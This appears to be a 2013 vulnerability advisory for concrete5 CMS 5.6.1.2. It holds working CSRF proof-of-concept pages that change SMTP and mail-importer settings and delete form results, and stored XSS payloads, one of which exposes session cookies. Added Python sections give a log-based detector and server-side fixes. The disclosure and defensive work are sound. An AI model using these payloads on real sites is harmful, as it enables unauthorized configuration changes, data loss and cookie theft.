=============================================================
                 eXpl0i13r - blackpentesters.blogspot.com
=============================================================
############################################################################################
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities ]
# Date: [2013-6-9]
# Exploit Author: [expl0i13r]
# Vendor Homepage: [http://www.concrete5.org/]
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/]
# Version: [5.6.1.2]
# Google Dork: [Built with concrete5 - an open source CMS]
# Tested on: [Windows]
# Contact: expl0i13r@gmail.com
############################################################################################
Summary:
========
1. CSRF (Modify SMTP Settings)
2. CSRF (Modify Mail Importers Settings)
3. CSRF (Delete Form Results)
4. Stored XSS
1. CSRF (Modify SMTP Settings):
================================
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities, one of which allows an attacker
to modify the "SMTP Settings" and "Send Mail Method" available at the URL below:
Affected URL:
--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/
----------------------------------------------------------------------------------------
Note: The code below fills in the form fields, submits them and updates the settings when the victim loads the page.
----------------------------------------------------------------------------------------
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform() {
  document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">
<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">
<option value="">None</option>
<option value="SSL" selected="selected">SSL</option>
<option value="TLS">TLS</option>
</select>
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">
</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>

2. CSRF (Modify Mail Importer Settings)
=========================================
The code below exploits a CSRF vulnerability that allows an attacker to edit and update the "Importer Settings" details.
Affected URL:
---------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/
----------------------------------------------------------------------------------------
Note: The code below fills in the form fields, submits them and updates the importer settings when the victim loads the page.
----------------------------------------------------------------------------------------
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform() {
  document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name="myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">
<input type="hidden" name="miID" id="miID" value="1">
<input id="miEmail" type="text" name="miEmail" value="exploiter">
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text">
<input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">
<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">
<option value="" selected="selected">None</option>
</select>
<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">
<option value="1" selected="selected">Yes</option>
</select>
<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">
<option value="POP" selected="selected">POP</option>
</select>
</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>

3. CSRF (Delete Form Results)
===============================
Each submission listed on the "REPORTS" > "Form Results" page has a static "qsID" assigned, which an attacker can use to delete submissions.
Ex.
---
When this CMS is installed, a "Contact Us" form is available by default at the URL: http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/
For the above "Contact Form", the qsID in my case is "1370626098", which can be found at the URL:
--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/
--------------------------------------------------------------------------------------
<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------
In order to exploit this CSRF, the attacker must know the "qsID" value, for which the attacker needs at least limited access to the CMS.
Steps:
------
1. Attacker logs in to the CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Gets the static "qsID" value from the page source
4. Uses the "qsID" to create the CSRF exploit below
Code:
-------
<html>
<head>
<script>
// Delete submissions of the "Contact Us" page
// ("delete" is a reserved word in JavaScript, so the function is named deleteSubmissions)
function deleteSubmissions() {
  window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");
}
</script>
</head>
<body onload="deleteSubmissions()"></body>
</html>

4. Multiple Stored XSS
=======================
concrete5 CMS also suffers from a Stored XSS vulnerability, which can be used to "Delete Form Results"
every time the page is loaded.
Stored XSS-1
============
URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/
Vulnerable Parameter:
----------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">
XSS-CSRF Payload:
------------------
"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>
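As an added detection example written for this advisory (not code from the advisory or from concrete5), the Python script below scans web-server access-log lines in "combined" format for the request patterns the PoCs above produce: a GET with action=deleteFormAnswers that was not clicked on the reports page itself (the stored payload above fires it via window.open from a different dashboard page), and a POST to the mail settings savers arriving with an off-site or missing Referer. The log lines are constructed for the example; SITE_HOST, REPORTS_PAGE and SETTINGS_SAVERS are assumptions matching the advisory's test setup.

```python
import re
from urllib.parse import parse_qs, urlparse

# Host the CMS is served on (assumed to match the advisory's test setup).
SITE_HOST = "127.0.0.1"
REPORTS_PAGE = "/dashboard/reports/forms/"
SETTINGS_SAVERS = ("/mail/method/save_settings/", "/mail/importers/save_importer/")

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not from a real server); paths follow the advisory's URLs.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2013:10:00:01 +0000] "POST /concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/ HTTP/1.1" 302 - "http://attacker.invalid/csrf.html" "Mozilla/5.0"
203.0.113.5 - - [09/Jun/2013:10:00:09 +0000] "GET /concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers HTTP/1.1" 302 - "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/groups/" "Mozilla/5.0"
203.0.113.5 - - [09/Jun/2013:10:01:30 +0000] "GET /concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers HTTP/1.1" 302 - "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/" "Mozilla/5.0"
203.0.113.5 - - [09/Jun/2013:10:02:00 +0000] "POST /concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/ HTTP/1.1" 302 - "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a reason string when the request looks cross-site-forged, else None."""
    target = urlparse(entry["target"])
    query = parse_qs(target.query)
    referer = entry["referer"]
    ref = urlparse(referer) if referer not in ("", "-") else None
    off_site = ref is None or ref.hostname != SITE_HOST

    if query.get("action") == ["deleteFormAnswers"] and entry["method"] == "GET":
        # The legitimate "Delete Submissions" link is clicked on the reports page itself;
        # any other referer (another dashboard page, an external page, none) is suspicious.
        if off_site or not ref.path.endswith(REPORTS_PAGE):
            return "form-results deletion not initiated from the reports page"
    if entry["method"] == "POST" and target.path.endswith(SETTINGS_SAVERS) and off_site:
        return "mail settings changed from an off-site or missing Referer"
    return None


def scan(log_text):
    """Return [(line_number, reason)] for suspicious entries in the log text."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            findings.append((number, reason))
    return findings


if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

Referer checks are a heuristic only: browsers may strip the header, and a payload stored in another dashboard page makes the deletion request look same-site. The rule therefore keys on the exact page the legitimate link lives on, which is also why a state change that is reachable by plain GET is worth alerting on at all.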
Stored XSS-2:
=============
URL:
-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/
Vulnerable Parameter:
----------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">
Payload:
---------
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>

###################################
##            eXpl0i13r            ##
## ------------------------------ ##
## |blackpentesters.blogspot.com | ##
## |infotech-knowledge.blogspot.in| ##
## ------------------------------ ##
###################################
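The following is an added illustration written for this advisory, not concrete5's own code: a minimal Python request handler showing the server-side controls that close all four issues above. Sections 1 to 3 need a per-session synchronizer token embedded in the form and checked with a constant-time compare, an Origin/Referer same-site check as defence in depth, and deletion of form results via a POST rather than the GET link; section 4 needs attribute-context encoding of gName/asName when they are echoed back. Session, Request, csrf_ok, SITE_ORIGIN and the ccm_token field name are assumptions of this example.

```python
import hmac
import html
import secrets
from dataclasses import dataclass, field

# Origin the dashboard is served from; assumed for this example (the advisory's test host).
SITE_ORIGIN = "http://127.0.0.1"


@dataclass
class Session:
    """Stand-in for the server-side session: one random token per login."""
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    """Stand-in for an incoming HTTP request (constructed, not a real framework type)."""
    method: str
    headers: dict
    form: dict


def render_settings_form(session, action):
    """Embed the session token as a hidden field; a cross-site page cannot read it."""
    return (f'<form method="post" action="{html.escape(action, quote=True)}">'
            f'<input type="hidden" name="ccm_token" '
            f'value="{html.escape(session.csrf_token, quote=True)}"></form>')


def same_site(request):
    """True when the Origin/Referer (if the browser sent one) points at SITE_ORIGIN.
    A missing header is tolerated because the token below remains the primary control."""
    origin = request.headers.get("Origin") or request.headers.get("Referer", "")
    return origin == "" or origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def csrf_ok(request, session):
    """A state change is accepted only as a POST carrying the session's token
    (compared in constant time) from a same-site page."""
    if request.method != "POST":
        return False
    token = request.form.get("ccm_token", "")
    if not hmac.compare_digest(token, session.csrf_token):
        return False
    return same_site(request)


def save_mail_settings(request, session, settings):
    """Sections 1/2: returns (status, settings); nothing changes on a failed check."""
    if not csrf_ok(request, session):
        return 403, settings
    updated = dict(settings)
    for key in ("MAIL_SEND_METHOD", "MAIL_SEND_METHOD_SMTP_SERVER",
                "MAIL_SEND_METHOD_SMTP_USERNAME", "MAIL_SEND_METHOD_SMTP_PASSWORD"):
        if key in request.form:
            updated[key] = request.form[key]
    return 200, updated


def delete_form_answers(request, session, results):
    """Section 3: deletion is a token-bearing POST, never a bare GET link."""
    if not csrf_ok(request, session):
        return 403, results
    qs_id = request.form.get("qsID", "")
    return 200, [r for r in results if r["qsID"] != qs_id]


def render_group_name_field(name):
    """Section 4: encode the stored name for the attribute context so '">' cannot break out."""
    return f'<input type="text" name="gName" value="{html.escape(name, quote=True)}">'
```

The token check alone defeats the three PoC pages, because a page on another origin can neither read the hidden field nor guess a 256-bit random value; moving deletion to POST additionally makes the stored payload's window.open call harmless, since a GET no longer deletes anything. The encoding fix is contextual: html.escape with quote=True covers the value="..." attribute the parameters are rendered into, and a different context (script or URL) would need its own encoder.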